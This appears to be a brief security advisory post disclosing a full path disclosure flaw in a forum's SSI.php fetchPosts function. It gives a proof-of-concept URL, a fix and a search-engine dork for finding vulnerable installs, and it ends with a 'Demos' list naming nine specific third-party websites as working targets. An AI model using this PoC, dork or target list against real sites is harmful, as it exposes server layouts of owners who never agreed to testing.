*Summary:* -------------- A security flaw allows an attacker to know the full path of the web system. *Details: ----------- *SSI.php Line 294: // Fetch a post with a particular ID. By default will only show if you have permission to the see the board in question - this can be overriden. function ssi_fetchPosts($post_ids, $override_permissions = false, $output_method = 'echo') { $post_id is not defined. Possible fix: ($post_id = false) *PoC: ------- *http://example.com/forumpath/SSI.php?ssi_function=fetchPosts *Google Dorks: --------------------- *inurl:?index.php?action=help *Demos: ----------- *http://simpleportal.net/SSI.php?ssi_function=fetchPosts http://www.furgovw.org/SSI.php?ssi_function=fetchPosts http://www.teachmideast.com/forum_old/SSI.php?ssi_function=fetchPosts http://www.slowracing.com/jaxfox/SSI.php?ssi_function=fetchPosts http://www.iptv2you.com/board/SSI.php?ssi_function=fetchPosts http://voceteopr.com/SSI.php?ssi_function=fetchPosts http://www.thesilverball.com/SSI.php?ssi_function=fetchPosts http://othforums.com/SSI.php?ssi_function=fetchPosts http://www.skinmod.eu/SSI.php?ssi_function=fetchPosts
0 comments:
Post a Comment